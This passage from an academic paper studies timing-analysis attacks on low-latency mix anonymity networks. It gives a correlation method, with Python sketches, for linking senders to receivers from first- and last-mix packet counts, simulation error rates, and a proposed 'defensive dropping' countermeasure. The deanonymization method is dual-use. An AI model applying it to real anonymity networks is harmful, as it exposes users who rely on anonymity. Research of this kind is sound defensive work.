nerable these systems are in practice and whether an attacker can successfully
use timing analysis for these types of attacks. For example, some research has
assumed that timing analysis is possible when dummy messages are not used [20,
21, 19], though this has not been carefully examined.
In this paper, we significantly clarify the threat posed to low-latency mix
systems by timing attacks through detailed simulations and analysis. We show
that timing attacks are a serious threat and are easy to exploit by a well-placed
attacker. We also measure the effectiveness of previously proposed defenses such
as cover traffic and the impact of path length on the attack. Finally, we intro-
duce a new variation of cover traffic that better defends against the attacks we
consider, and demonstrate this through our analysis. Our results are based pri-
marily on simulations of a set of attacking mixes that attempt to perform timing
attacks in a realistic network setting.
We begin by providing background on low-latency mix-based systems and
known attacks against them in Section 2. We present our system and attacker
model in Section 3. In Section 4, we discuss the possible timing attacks against
such systems and possible defenses. We present a simulation study in Section 5
in which we test the effectiveness of attacks and defenses. Section 6 gives the
results of this study. We discuss the meaning of these results in light of different
types of systems in Section 7 and we conclude in Section 8.
2
Background
A number of low-latency mix-based systems have been proposed, but systems
vary widely in their attention to timing attacks of the form we consider here.
Some systems, notably Onion Routing [19] and the second version of the Free-
dom [2] system, offer no special provisions to prevent timing analysis. In such
systems, if the first and last mixes on a path are compromised, effective timing
analysis may allow the attacker to link the sender and receiver identities [19].
When both the first and last mixes are chosen randomly with replacement from
the set of all mixes, the probability of attacker success is given as c^2/n^2, where c is
the number of attacker-owned mixes and n is the total number of mixes.
Both Tarzan [10] and the original Freedom system [2] use constant-rate cover
traffic between pairs of mixes, sending traffic only between covered links. This
defense makes it very difficult for an eavesdropper to perform timing analysis,
since the flows on each link are independent. In Freedom, however, the attack
is still possible for an eavesdropper, since there is no cover traffic between the
initiator and the first mix on the path, and between the last mix and the re-
sponder, the final destination of the initiator's messages. This exposed traffic,
[Figure 1 diagram: the initiator I, the chain of proxies M^I_1, M^I_2, ..., M^I_h, and the responder.]
Fig. 1. A path P^I with an initiator I (leftmost) communicating with a responder (rightmost). M^I_1 and M^I_h, the first and last mixes on the path originating at I, are controlled by attackers.
along with the exposed traffic leaving the path, can be linked via timing anal-
ysis. Additionally, both systems are still vulnerable to timing analysis between
attacker-controlled mixes. The mixes can distinguish between cover traffic and
real traffic and will only consider the latter for timing analysis. This nullifies the
effect of this form of cover traffic when attacker mixes are considered.
Web-Mixes [3], ISDN-Mixes [14], and Pipenet [7] all use a constant-rate cover
traffic along the length of the path, i.e., by sending messages at a constant rate
through each path. In these systems, it is unclear whether timing analysis is
possible, since each initiator appears to send a constant rate of traffic at all
times. An Onion Routing proposal for partial-path cover traffic is an extension
of this idea [19]. In this case, the cover traffic only extends over a prefix of the
path. Mixes that appear later in the path do not receive the cover traffic and
only see the initiator traffic. Thus, an attacker mix in the covered prefix sees a
very different traffic pattern than an attacker mix in the uncovered suffix. It is
thus conceivable that the two mixes should find timing analysis more difficult.
3
System Model
Recall that our goal is to understand the threat posed by timing analysis attacks.
In this section, we develop a framework for studying different analysis methods
and defenses against them. We begin by presenting a system and attacker model.
In the next section, we use this model to analyze attacks and defenses.
Figure 1 illustrates an initiator's path in a mix system. We focus on a particular initiator I, who uses a path, P^I, of mixes in the system. The path P^I consists of a sequence of h mixes that starts with M^I_1 and ends with M^I_h. Although in many protocols the paths of each initiator can vary, to avoid cumbersome notation and without loss of generality, we let h denote the last mix in that particular path; our results do not assume a fixed or known path length. M^I_1 receives packets from the initiator I, and M^I_h sends packets to the appropriate responders. We assume that each link between two mixes typically carries packets from multiple initiators, and that for each packet received, a mix can identify the path P^I to which the packet corresponds. This is common among low-latency mix systems, where when a path P^I is first established, every mix server on P^I is given a symmetric encryption key that it shares with I, and with which it decrypts (encrypts) packets traversing P^I in the forward (respectively, reverse) direction. We assume that M^I_h recognizes that it is the last mix on the path P^I. We also
assume that mix M^I_1 recognizes that it is the first mix on the path P^I and thus that I is, in fact, the initiator.

Though not shown in Figure 1, in our model we assume there are many paths through the system. We are interested in the case where an attacker controls M^I_1 and M^J_h on two paths P^I and P^J that are not necessarily distinct. The attacker's goal is to determine whether I = J. If I = J and the attacker ascertains this, then it learns the responders to which I is communicating.

For these scenarios, we focus on the adversary's use of timing analysis to determine whether I = J. Packets that I sends along P^I run on a general-purpose network between the initiator I and M^I_1, and between each pair M^I_k and M^I_{k+1}. On this stretch of network there are dropped packets and variable transmission delays. Since these drops and delays affect packet behavior as seen further along the path, they can form a basis on which the attacker at M^I_1 and M^J_h, for example, can infer that I = J. Indeed, the attacker may employ active attacks that modify the timings of packets emitted from M^I_1 or intentionally drop packets at M^I_1, to see if these perturbations are reflected at M^J_h. For simplicity, we generally assume that the attacker has no additional information to guide his analysis, i.e., that there is no a priori information as to whether I = J.
4
Timing Attacks and Defenses
In this section, we describe the kinds of methods that an attacker in our model
can use to successfully perform timing analysis. Additionally, we discuss defenses
that can be used in the face of these kinds of attacks. In particular, we introduce
a new type of cover traffic to guard against timing attacks.
4.1
Timing Analysis Attacks
The essence of a timing attack is to find a correlation between the timings of packets seen by M^I_1 and those seen by an end point M^J_h. The stronger this correlation, the more likely I = J and M^J_h is actually M^I_h. Attacker success also depends on the relative correlations between the timings at which distinct initiators I and J emit packets. That is, if M^I_1 and M^J_1 happen to see exactly the same timings of packets, then it is not possible to determine whether the packet stream seen at M^J_h is a match for M^I_1 or M^J_1.

To study the timing correlations, the most intuitive random variable for the attacker is the difference, δ_i, between the arrival time of a packet i and the arrival time of its successor packet. If the two attacker mixes are on the same path P^I, there should be a correlation between the δ_i values seen at the two mixes; for example, if δ_i is relatively large at M^I_1, then the δ_i at M^I_h is more likely to be larger than average. The correlation does not need to be strong, as long as it is stronger than the correlations that would occur between M^I_1 and M^J_h, for two different initiators I and J.

Unfortunately, this random variable is highly sensitive to dropped packets. A dropped packet that occurs between M^I_1 and M^I_h will cause later timings to be
off by one. As a result, the correlation will be calculated between packets that are not matched: an otherwise perfect correlation will appear to be a mismatch.

Therefore, we extract a new random variable from the data that is less sensitive to packet drops. We use nonoverlapping and adjacent windows of time with a fixed duration W. Within instance k of this window, mix M maintains a count X^I_k of the number of packet arrivals on each path, P^I, in which M participates. Our analysis then works by cross-correlating X^I_k and X^J_k at the two different mixes.

To enhance the timing analysis, the attacker can employ a more active approach. Specifically, the attacker can drop packets at M^I_1 intentionally. These drops and the gaps they create will propagate to M^I_h and should enhance the correlation between the two mixes. Additionally, a careful placement of packet drops can effectively reduce the correlation between M^I_1 and M^J_1 for I ≠ J.
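To make the windowed statistic concrete, the following sketch (our own illustration, not the simulation code used in this paper) computes the counts X_k from packet arrival times and cross-correlates two such sequences:

# Sketch: windowed packet counts and their cross-correlation.
import math

def window_counts(arrival_times, W, num_windows):
    # X_k: number of packet arrivals in window k of fixed duration W.
    counts = [0] * num_windows
    for t in arrival_times:
        k = int(t / W)
        if k < num_windows:
            counts[k] += 1
    return counts

def correlation(x, y):
    # Normalized correlation coefficient of the two count sequences.
    n = len(x)
    mx, my = sum(x) / float(n), sum(y) / float(n)
    cov = sum((x[i] - mx) * (y[i] - my) for i in range(n))
    sx = math.sqrt(sum((v - mx) ** 2 for v in x))
    sy = math.sqrt(sum((v - my) ** 2 for v in y))
    return cov / (sx * sy) if sx and sy else 0.0

# For streams on the same path, the coefficient should be noticeably
# higher than for streams belonging to different initiators.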
4.2
The Defenses
A known defense against timing attacks is to use a constant rate of cover traffic
along the length of the entire path [14, 7]. This defense is useful, since it dra-
matically lowers the correlations between M I
1 and M I
h. The lowered correlations
may seem unexpected, since both nodes will now see approximately the same
number of packets at all times. The difference is that the variations in packet
delays must now be correlated: a long delay between two packets at M I
1 must
match a longer-than-average delay between the same two packets at M I
h for the
correlation to increase. If the magnitude of variation between M I
1 and M I
h dom-
inates the magnitude of variation between I and M I
1 , this matching will often
fail, reducing the correlation between the two streams.
This approach faces serious problems, however, when there are dropped pack-
ets before or at M I
1 . Dropped packets provide holes in the traffic, i.e., gaps where
there should have been a packet, but none appeared. With only a few such holes,
the correlation should increase for M I
1 and M I
h, while the correlation between
M J
1 and M I
h should decrease. Packet drops can happen due to network events
on the link between the initiator and M I
1 , or the attacker can have M I
1 drop
these packets intentionally.
We now introduce a new defense against timing analysis, called defensive dropping. With defensive dropping, the initiator constructs some of the dummy packets such that an intermediate mix $M_m^I$, $1 \le m \le h$, is instructed to drop the packet. To achieve this, we only need one bit inside the encryption layer for $M_m^I$. If $M_m^I$ is an honest participant, it will drop the dummy packet rather than sending it to the next mix (there will only be a random string to pass on anyway, but an attacker might try to resend an older packet). If these defensive drops are randomly placed with a sufficiently large frequency, the correlation between the first attacker and the last attacker will be reduced.
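A schematic of the drop-bit mechanism (our own sketch; real packets would be onion-encrypted per hop, which we elide):

```python
import random

def make_cover_packet(h, drop_at=None):
    """One header layer per mix; an honest mix at position drop_at sees
    its drop bit set and discards the packet instead of forwarding it."""
    return [{"hop": m, "drop": m == drop_at} for m in range(1, h + 1)]

def cover_stream(n, h, drop_rate=0.5):
    """Mark a random fraction of dummy packets for dropping at a random
    mix position m, 1 <= m <= h."""
    return [make_cover_packet(h, random.randint(1, h)
                              if random.random() < drop_rate else None)
            for _ in range(n)]
```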
Defensive dropping is a generalization of “partial-path cover traffic,” in which
all of the cover traffic is dropped at a designated intermediate mix [19]. To
further generalize, we note that the dropping need not be entrusted to a single
mix. Rather, multiple intermediate mixes can collectively drop a set of packets.
We discuss and analyze defensive dropping in depth in Section 7.
5 Simulation Methodology
We determined the effectiveness of timing analysis and various defenses using a
simulation of network scenarios. We isolated timing analysis from path selection,
a priori information, and any other aspects of a real attack on the anonymity and
unlinkability of initiators in a system. To achieve this, the simulations modeled
only the case when an attacker controls both the first and the last mix in the
path — this is the key position in a timing attack.
We simulated two basic scenarios of mixes: one based on high-resource servers and a second based on low-resource peers. In the server scenario, each mix is a
dedicated server for the system, with a reliable low-latency link to the Inter-
net. This means that the links between each mix are more reliable with low to
moderate latencies, as described below. In the peer-based scenario, each mix is
also a general purpose computer that may have an unreliable or slow link to the
Internet. Thus, the links between mixes have more variable delays and are less
reliable on average in a peer-based setting.
The simulation selected a drop rate for each link using an exponential distri-
bution around an average value. We modeled the drop rate on the link between
the initiator and first mix differently than those on the links between mixes.
The link between the initiator and the first mix exhibits a drop rate, called the
early drop rate (edr), with average either 1% or 5%. In the server scenario, the
average inter-mix drop rate (imdr) is either 0%, meaning that there are no drops
on the link, or 1%. For the imdr in the peer-based scenario, we use either 1% or
5% as the average drop rate. The lower imdr in the server case reflects
good network conditions as can usually be seen on the Internet Traffic Report
(http://www.internettrafficreport.com). For many test points on the Internet,
there is typically a drop rate of 0%, with occasional jumps to about 1%. Some
test points see much worse network performance, with maximal drop rates ap-
proaching 25%. Since these high rates are rare, we allow them only as unusually
high selections from the exponential distribution using a lower average drop rate.
For the peer-based scenario, the average delay on a link is selected using a
distribution from a study of Gnutella peers [17]. The median delay from this
distribution is about 112ms, but the 98th percentile is close to 3.1 seconds,
so there is substantial delay variation. For the server scenario, we select a less
variable average delay, using a uniform distribution between 0ms and 1ms (“low”
delay) or between 0ms and 100ms (“high” delay). Given an average delay for a
link, the actual per-packet delays are selected using an exponential distribution
with that delay as the mean. This is consistent with results from Bolot [5].
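A sketch of the sampling just described (distribution parameters as stated above; the function names are our own assumptions):

```python
import numpy as np

rng = np.random.default_rng(1)

def sample_link(avg_drop_rate, avg_delay):
    """Draw a link's drop rate exponentially around its average; per-packet
    delays are then exponential with the link's average delay as the mean
    (consistent with Bolot [5]). Rare draws can exceed typical values,
    matching the 'unusually high selections' noted above."""
    drop_rate = rng.exponential(avg_drop_rate)
    def packet_delay():
        return rng.exponential(avg_delay)
    return drop_rate, packet_delay

# Server-scenario example: imdr = 1%, 'high' delay uniform in 0-100 ms.
drop_rate, delay = sample_link(0.01, rng.uniform(0.0, 0.100))
```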
In addition to edr, imdr, and delays, the simulation also accounts for the
length of the initiator’s path and the initiator’s communication rates. The path
length can be 5, 8, or selected from a uniform distribution between these
values. Larger path lengths are more difficult to use, since packets must have a
fixed length [6].
Generating initiator traffic requires a model of initiator behavior. For this
purpose, we employ one of four models for initiator behavior:
– HomeIP: The Berkeley HomeIP traffic study [11] has yielded a collection
of traces of 18 days' worth of HTTP traffic from users connecting to the Web
through a Berkeley modem pool in 1996. From this study, we determined the
distribution of times between each user request. To generate times between
initiator requests during our simulation, we generate uniformly random num-
bers and use those to select from the one million points in the distribution.
– Random: We found that the HomeIP-based traffic model generated rather
sparse traffic patterns. Although this is representative of many users' browsing behavior due to think times, we also wanted to consider a more active
initiator model. To this end, we ran tests with traffic generated using an ex-
ponentially distributed delay between packets, with a 100ms average. This
models an active initiator without any long lags between packets.
– Constant: For other tests, we model initiators that employ constant
rate path cover traffic. This traffic generator is straightforward: the initiator
emits messages along the path at a constant rate of five packets per second,
corresponding to sending dummy messages when it does not have a real
message to send. (Equivalently, the Random traffic model may be thought
of as a method of generating somewhat random cover traffic along the path.)
– Defensive Dropping: Defensive Dropping is similar to Constant, as the
initiator sends a constant rate of cover traffic. The difference is that packets
are randomly selected to be dropped. The rate of packets from the initiator
remains at five packets per second, with a chosen drop rate of 50 percent. (A sketch of these traffic generators follows this list.)
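The HomeIP model samples an empirical distribution from the trace study, so it is omitted here; the other three generators can be sketched as follows (our own illustration; names are assumptions):

```python
import numpy as np

rng = np.random.default_rng(2)

def random_traffic(n, mean_gap=0.100):
    """'Random' model: exponential inter-packet delays, 100 ms average."""
    return np.cumsum(rng.exponential(mean_gap, size=n))

def constant_traffic(n, rate=5.0):
    """'Constant' model: five packets per second, dummies filling gaps."""
    return np.arange(n) / rate

def defensive_dropping_traffic(n, rate=5.0, drop_rate=0.5):
    """'Defensive Dropping': the same constant-rate stream as sent by the
    initiator, with half the packets marked for an intermediate drop."""
    times = constant_traffic(n, rate)
    marked = rng.random(n) < drop_rate
    return times, marked
```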
Given a set of values for all the different parameters, we simulate the initia-
tor’s traffic along the length of her path and have the attacker save the timings
of packets received at the first and last mixes. We generate 10,000 such simula-
tions. We then simulate the timing analysis by running a cross correlation test
on the timing data taken from the two mixes. We test mixes on the same path
as well as mixes from different paths.
The statistical correlation test we chose works by taking adjacent windows of duration $W$. Each mix counts the number of packets $x_k$ it receives per path in the $k$-th window. We then cross-correlate the sequence $\{x_k\}$ of values observed for a path at one mix with the sequence $\{x'_k\}$ observed for a path at a different mix. Specifically, the cross-correlation at delay $d$ is defined to be

$$ r(d) = \frac{\sum_i (x_i - \mu)\,(x'_{i+d} - \mu')}{\sqrt{\sum_i (x_i - \mu)^2}\;\sqrt{\sum_i (x'_{i+d} - \mu')^2}} $$

where $\mu$ is the mean of $\{x_k\}$ and $\mu'$ is the mean of $\{x'_k\}$. We performed tests with $W = 10$ seconds and $d = 0$; as we will show, these yielded useful results for the workloads we explored.
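A direct implementation of this statistic (our own sketch, pairing with the hypothetical `window_counts` helper above):

```python
import numpy as np

def r(x, xp, d=0):
    """Cross-correlation r(d) of per-window counts {x_k} and {x'_k},
    per the formula above."""
    x = np.asarray(x, dtype=float)
    xp = np.asarray(xp, dtype=float)
    n = min(len(x), len(xp) - d)
    a = x[:n] - x[:n].mean()
    b = xp[d:d + n] - xp[d:d + n].mean()
    denom = np.sqrt((a * a).sum() * (b * b).sum())
    return float((a * b).sum() / denom) if denom else 0.0
```

For example, `r(window_counts(t_first, 10.0), window_counts(t_last, 10.0))` computes $r(0)$ with ten-second windows.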
traffic pattern      edr   imdr=0%,   imdr=0%,   imdr=1%,   imdr=1%,   imdr=1%,   imdr=5%,
                           low delay  high delay low delay  high delay gnutella   gnutella
HomeIP               1%    0.0000     0.0003     0.0007     0.0008     0.0026     0.0061
                     5%    0.0001     0.0005     0.0008     0.0010     0.0039     0.0070
Random               1%    0.0000     0.0000     0.0000     0.0000     0.0002     0.0003
                     5%    0.0000     0.0000     0.0000     0.0000     0.0004     0.0005
Constant             1%    0.0011     0.0346     0.0350     0.0814     0.1372     0.2141
                     5%    0.0002     0.0079     0.0108     0.0336     0.0557     0.1014
Defensive Dropping   1%    0.1925     0.2424     0.2022     0.2506     0.2875     0.3117
                     5%    0.0930     0.1233     0.1004     0.1289     0.1550     0.1830

Table 1. Equal error rates for simulations with path lengths between 5 and 8, inclusive. The rows give the initiator traffic model and the drop rate before reaching the first mix (edr). The columns give the delay characteristics and drop rates (imdr) on each link between the first mix and the last mix. See Section 5 for details.
We say that we calculated $r(0; I, J)$ if we used values $\{x_k\}$ from packets on $P^I$ as seen by $M_1^I$ and values $\{x'_k\}$ from packets on $P^J$ as seen by $M_h^J$. We infer that the values $\{x_k\}$ and $\{x'_k\}$ indicate the same path (the attackers believe that $I = J$) if $|r(0; I, J)| > t$ for some threshold $t$. For any chosen $t$, we calculate the rate of false positives: the fraction of pairs $(I, J)$ such that $I \neq J$ but $|r(0; I, J)| > t$. We also compute the false negatives: the fraction of initiators $I$ for which $|r(0; I, I)| \le t$.
6 Evaluation Results
Decreasing the threshold, t, raises the false positive rate and decreases the false
negative rate. Therefore, an indication of the quality of a timing attack is the
equal error rate, obtained as the false positive and negative rates once t is ad-
justed to make them equal. The lower the equal error rate, the more accurate
the test is.
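A sketch of how the equal error rate can be located by sweeping $t$ over the observed scores (illustrative only; `equal_error_rate` is a hypothetical name):

```python
import numpy as np

def equal_error_rate(same_path_r, diff_path_r):
    """Sweep the threshold t over observed |r(0)| values and return the
    point where false-positive and false-negative rates are closest."""
    same, diff = np.abs(same_path_r), np.abs(diff_path_r)
    best_gap, eer = np.inf, 1.0
    for t in np.unique(np.concatenate([same, diff])):
        fn = np.mean(same <= t)   # same-path pairs the test misses
        fp = np.mean(diff > t)    # different-path pairs it links
        if abs(fn - fp) < best_gap:
            best_gap, eer = abs(fn - fp), (fn + fp) / 2.0
    return eer
```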
Representative equal error rate results are shown in Table 1. For all of these
data points, the initiator’s path length is selected at random between 5 and 8,
inclusive. Not represented are data for fixed path lengths of 5 and 8; lower path
lengths led to lower equal error rates overall.
Results presented in Table 1 show that the timing analysis tests are very
effective over a wide range of network parameters when there is no constant-rate cover traffic. With the HomeIP traffic, the equal error rate never reaches 1%.
Such strong results for attackers could be expected, since initiators often have
long gaps between messages. These gaps will seldom match from one initiator
to another.
Perhaps more surprising are the very low error rates of the attack for the Random traffic flows (exponentially distributed inter-packet delays with average
delay of 100ms). One might expect that the lack of significant gaps in the data
Timing Attacks in Low-Latency Mix Systems
9
would make the analysis more difficult for the attacker. In general, however,
the gaps still dominate variation in the delay. This makes correlation between
unrelated streams unlikely, while maintaining much of the correlation along the
same path.
When constant rate cover traffic is used, the effectiveness of timing analysis
depends on the network parameters. When the network has few drops and low
latency variation between the mixes, the attacker continues to do well. When
imdr = 0% and the inter-mix delay is less than 1ms, meaning that the variation
in the delay is also low, the timing analysis had equal error rates of 0.0011 and 0.0002 for edr = 1% and edr = 5%, respectively. Larger delays and higher drop rates lead to higher error rates for the attacker. For example, with an imdr = 1% drop rate and delays between 0ms and 100ms between mixes, the error rates become 0.0814 for edr = 1% and 0.0336 for edr = 5%.
6.1 Effects of Network Parameters
To better compare how effective timing analysis tests are with different network
parameters, we can use the rates of false negatives and false positives to get a
Receiver Operating Characteristic (ROC) curve (see http://www.cmh.edu/stats/ask/roc.asp). Let fp denote the false positive rate and fn denote the false negative
rate. Then fp is the x-axis of a ROC curve and 1 − fn is the y-axis. A useful
measure of the quality of a particular test is the area under the curve (AUC).
A good test will have an AUC close to 1, while poor tests will have an AUC as
low as 0.5. We do not present AUC values. The relative value of each test will
be apparent from viewing their curves on the same graph; curves that are closer
to the upper left-hand corner are better. We only give ROC curves for constant
rate cover traffic, with and without defensive dropping, as the other cases are
generally too close to the axes to see.
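The ROC construction and AUC computation can be sketched as follows (our own illustration; names are assumptions):

```python
import numpy as np

def roc_curve(same_path_r, diff_path_r):
    """ROC points: x = false positive rate, y = 1 - false negative rate,
    for thresholds swept over the observed |r(0)| scores."""
    same, diff = np.abs(same_path_r), np.abs(diff_path_r)
    ts = np.unique(np.concatenate([same, diff]))[::-1]
    fp = np.array([np.mean(diff > t) for t in ts])
    tp = np.array([np.mean(same > t) for t in ts])   # = 1 - fn
    return fp, tp

def auc(fp, tp):
    """Area under the ROC curve (trapezoid rule)."""
    return float(np.trapz(tp, fp))
```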
We can see from the ROC curves in Figure 2 how the correlation tests perform
with varying network conditions. The bottommost lines in Figures 2(a–b) show
that the test is least accurate with imdr = 5% and the relatively large delays
taken from the Gnutella traffic study. imdr appears to be the most significant
parameter, and as the imdr lowers to 1% and then 0% on average, the ROC
curve gets much closer to the upper left hand corner. Delay also impacts the
error rates, but to a lesser extent. Low delays result in fewer errors by the test
and a ROC curve closer to the upper-left-hand corner.
In Figure 2(c), we see how the correlation tests are affected by edr. edr’s
effect varies inversely to that of imdr. With edr = 5%, the area under the ROC
curve is relatively close to one. Note that the y-axis extends down only to 0.75 and the x-axis only to 0.25. For the same imdr, correlation tests with
edr = 1% have significantly higher error.
Figure 2(d) graphs the relationship between path length and the attackers' success. Not surprisingly, longer paths decrease the attackers' success, as there is more chance for the network to introduce variability into streams of packets.
We can compare the use of defensive dropping with constant rate cover traffic in Figures 2(e–f).
[Figure 2 here: six ROC panels, x-axis "False Positive Rate," y-axis "1 − (False Negative Rate)." Panels: (a) edr = 1%; (b) edr = 5%; (c) high link delay; (d) edr = 5%, imdr = 1%, high link delay; (e) edr = 1%, high link delay; (f) edr = 5%, high link delay. Curves compare imdr values (0%, 1%, 5%) and delay models (low, high, p2p); panels (e)–(f) additionally compare constant-rate cover traffic with and without defensive dropping.]
Fig. 2. ROC curves of simulation results.
It is clear that in both models, the defensive dropping ROC curves are much farther from the upper-left-hand corner than the curves based on tests without defensive dropping. Defensive dropping makes a much larger difference than the imdr does. From Figures 2(a–b), we know that imdr is an important factor in how well these tests do; since defensive dropping has a much larger impact than imdr, it does far more than typical variations in network conditions to confuse the attacker.
7 Discussion
Having isolated timing analysis from particular systems and attacks, we now discuss the implications of our results. We first note that, rather than occurring in isolation along a single path, timing analysis would occur in a system
with many paths from many initiators. This creates both opportunities and dif-
ficulties for an attacker. We begin by showing how the attacker’s effectiveness
is reduced by prior probabilities. We then show how, when paths or network
conditions change, and when initiators make repeated or long-lasting connec-
tions, an attacker can benefit. We then describe other ways an attacker can
improve his chances of linking the initiator to the responder. We also examine
some important systems considerations.
7.1 Prior Probabilities
One of the key difficulties an attacker must face is that the odds of a correct
identification vary inversely with the number of initiators. Suppose that, for
a given set of network parameters and system conditions, the attacker would
have a 1% false positive rate and a 1% false negative rate. Although these may
seem like favorable error rates for the attacker, there can be a high incidence
of false positives when the number of initiators grows above 100. The attacker
must account for the prior probability that the initiator being observed is the
initiator of interest, I.
More formally, let us say that event $I \sim J$, for two initiators $I$ and $J$, occurs when the attacker's test says that packets received at $M_1^I$ and $M_h^J$ are correlated. Assume that the false positive rate, $f_p = \Pr(I \sim J \mid I \neq J)$, and the false negative rate, $f_n = \Pr(I \not\sim J \mid I = J)$, are both known. We can therefore obtain:
$$\begin{aligned}
\Pr(I \sim J) &= \Pr(I \sim J \mid I = J)\Pr(I = J) + \Pr(I \sim J \mid I \neq J)\Pr(I \neq J) \\
&= (1 - f_n)\Pr(I = J) + f_p\,(1 - \Pr(I = J)) \\
&= (1 - f_n - f_p)\Pr(I = J) + f_p
\end{aligned}$$

which leads to:

$$\begin{aligned}
\Pr(I = J \mid I \sim J) &= \frac{\Pr(I = J \wedge I \sim J)}{\Pr(I \sim J)}
= \frac{\Pr(I \sim J \mid I = J)\Pr(I = J)}{\Pr(I \sim J)} \\
&= \frac{(1 - f_n)\Pr(I = J)}{(1 - f_n - f_p)\Pr(I = J) + f_p}
\end{aligned}$$
Suppose $\Pr(I = J) = 1/n$, e.g., the network has $n$ initiators and the adversary has no additional information about who are likely correspondents. Then, with $f_n = f_p = 0.01$, we get $\Pr(I = J \mid I \sim J) = 0.99/(0.99 + 0.01(n - 1))$. With only $n = 10$ initiators, the probability of $I = J$ given $I \sim J$ is about 91.7%. As $n$ rises to 100 initiators, this probability falls to only 50%. With $n = 1000$, it is just over 9%.
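The posterior above is easy to check numerically (a sketch; `posterior` is our own name):

```python
def posterior(prior, fn=0.01, fp=0.01):
    """Pr(I = J | I ~ J) from the derivation above."""
    return (1 - fn) * prior / ((1 - fn - fp) * prior + fp)

for n in (10, 100, 1000):
    print(n, round(posterior(1.0 / n), 3))   # -> 0.917, 0.5, 0.09
print(round(posterior(0.09), 3))             # stronger prior -> ~0.907
```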
Contrast this with the case of $\Pr(I = J) = 0.09$, as when the adversary has obtained additional information about the application, or via the derivation above in a previous examination of a different path for the same initiator $I$ (if it is known that the initiator will contact the same responder repeatedly). Then, with $n = 1000$, the probability of $I = J$ given $I \sim J$ is about 90.7%.
The lessons from this analysis are as follows. First, when the number of initiators is large, the attacker's test must be very accurate to correctly identify the initiator if the attacker has no additional information about the a priori probability of an initiator and responder interacting (i.e., if $\Pr(I = J) = 1/n$). In this case, defensive dropping appears to be an effective strategy for stopping a timing analysis test in a large system. By significantly increasing the error rates for the attacker (see Table 1), defensive dropping makes a timing analysis that was otherwise useful much less informative. Second, a priori information, i.e., when $\Pr(I = J) > 1/n$, can be very helpful to the attacker in large systems.
7.2 Lowering the Error Rates
The attackers cannot effectively determine the best level of correlation with
which to identify the initiator unless they can observe the parameters of the net-
work. One approach would be to create fake users, generally an easy task [9], and
each such user $F$ can generate traffic through paths that include attacker mixes as $M_1^F$ and $M_h^F$. This can be done concurrently with the attack, as the attack
data may be stored until the attackers are ready to analyze it. The attacker can
compare the correlations from traffic on the same path and traffic on different
paths, as with our simulations, and determine the best correlation level to use.
In mix server systems, especially cascade mixes [6], the attacker has the additional advantage of being able to compare possible initiators' traffic data to find the best match for a data set taken at $M_h^I$ for some unknown $I$. With a mix cascade in which $n$ users participate, the attacker can guess that the mix with the traffic timings that best correlate to the timings taken from a stream of interest at $M_h^I$ is $M_1^I$. This can lower the error rate for the attacker: while a number of streams may have relatively high correlations with the timing data at $M_h^I$, it may be that $M_1^I$ will typically have the highest such correlation.
7.3 Attacker Dropping
Defensive dropping may also be thwarted by an attacker that actively drops
packets. When an attacker controls the first mix on the path, he may drop
sufficient packets to raise the correlation level between the first and last mixes.
With enough such drops, the attacker will be able to raise his success rates.
When defensive dropping is in place, however, the incidence of attacker drops
must be higher than with constant rate cover traffic. Any given drop might be
due to the defensive dropping rather than the active dropping. This means that
the rate of drops seen by the packet dropping mix (or mixes) will be higher than
it would otherwise be. What is unclear is whether such an increase would be
enough to be detected by an honest intermediate mix.
In general, detection of mixes that drop too many packets is a problem of
reputation and incentives for good performance [8, 1] and is beyond the scope of
this paper. We note, however, that stopping active timing attacks requires very
robust reputation mechanisms that allow users to avoid placing unreliable mixes
at the beginning of their paths. In addition, it is important that a user have a
reliable link to the Internet so that the first mix does not receive a stream of
traffic with many holes to exploit for correlation with the last mix on the path.
7.4 TCP Between Mixes
In our model, we have assumed that each message travels on unreliable links
between mixes. This allows for dropped packets that have been important in
most of the attacks we have described. When TCP is used between each mix,
each packet is reliably delivered despite the presence of drops. The effect this
has on the attacks depends on the packet rates from the initiator and on the
latency between the initiator and the first mix.
For example, suppose that the initiator sends 10 packets per second and that
the latency to the first mix averages 50 ms (100 ms RTT). A dropped packet will
cause a timeout for the initiator, who must resend the packet. The new packet
will be resent in approximately 100 ms in the average case, long enough for an
estimated RTT to trigger a timeout. One additional packet will be sent by the
initiator, but there will still be a gap of 100 ms, which is equivalent to a packet
loss for timing analysis.
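A back-of-the-envelope sketch of this example (our own illustration, using the stated 10 packets per second and 100 ms RTT):

```python
def retransmit_hole(rate_pps=10, rtt=0.100):
    """A drop is repaired about one RTT later, so the receiver sees
    roughly an extra-RTT hole on top of the nominal 1/rate spacing --
    which the windowed-count test treats much like a lost packet."""
    nominal = 1.0 / rate_pps
    return nominal, nominal + rtt   # (normal gap, gap around the drop)

print(retransmit_hole())            # (0.1, 0.2): a ~100 ms extra gap
```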
This effect, however, is sensitive to timing. When fewer packets are sent per
second and the latency is sufficiently low, such effects can be masked by rapid
retransmissions. However, an attacker can still actively delay packets, and a
watchful honest mix later in the path will not know whether such delays were
due to drops and high retransmission delays before the first mix or due to the
first mix itself.
7.5 The Return Path
Timing attacks can be just as effective and dangerous on the path from $M_h^I$ back to $I$ as on the forward path. Much of what we have said applies to the reverse path, but there are some key differences. One difference is that $I$ must rely on $M_h^I$ to provide cover traffic (unless the responder is a peer using an anonymous reverse path). This, of course, can be a problem if $M_h^I$ is dishonest. However, due to the reverse layered encryption, any mix before $M_1^I$ can generate the cover traffic and it can still be effective.
Because many applications, such as multimedia viewing and file downloads,
require more data from the responder than from the initiator, there is a sig-
nificant performance problem. Constant rate cover traffic can quickly become
prohibitive, requiring a significant fraction of the bandwidth of each mix. For
such applications, stopping timing attacks may be unattainable with acceptable
costs.
When cover traffic remains possible, defensive dropping is no longer an option, as a dishonest $M_h^I$ would know the timings of the drops. Instead, the last mix should not provide the full amount of cover traffic, letting each intermediate mix add some constant-rate cover traffic in the reverse pattern of defensive dropping. This helps keep the correlation between $M_h^I$ and $M_1^I$ low.
8 Conclusions
Timing analysis against users of anonymous communications systems can be
effective in a wide variety of network and system conditions, and therefore poses
a significant challenge to the designer of such systems.
We presented a study of both timing analysis attacks and defenses against
such attacks. We have shown that, under certain assumptions, the conventional
use of cover traffic is not effective against timing attacks. Furthermore, inten-
tional packet dropping induced by attacker-controlled mixes can nullify the effect
of cover traffic altogether. We proposed a new cover traffic technique, defensive
dropping, to obstruct timing analysis. Our results show that end-to-end cover
traffic augmented with defensive dropping is a viable and effective method to
defend against timing analysis in low-latency systems.
References
1. A. Acquisti, R. Dingledine, and P. Syverson. On the Economics of Anonymity. In
Proc. Financial Cryptography, Jan 2003.
2. A. Back, I. Goldberg, and A. Shostack. Freedom 2.0 Security Issues and Analysis.
Zero-Knowledge Systems, Inc. white paper, Nov 2000.
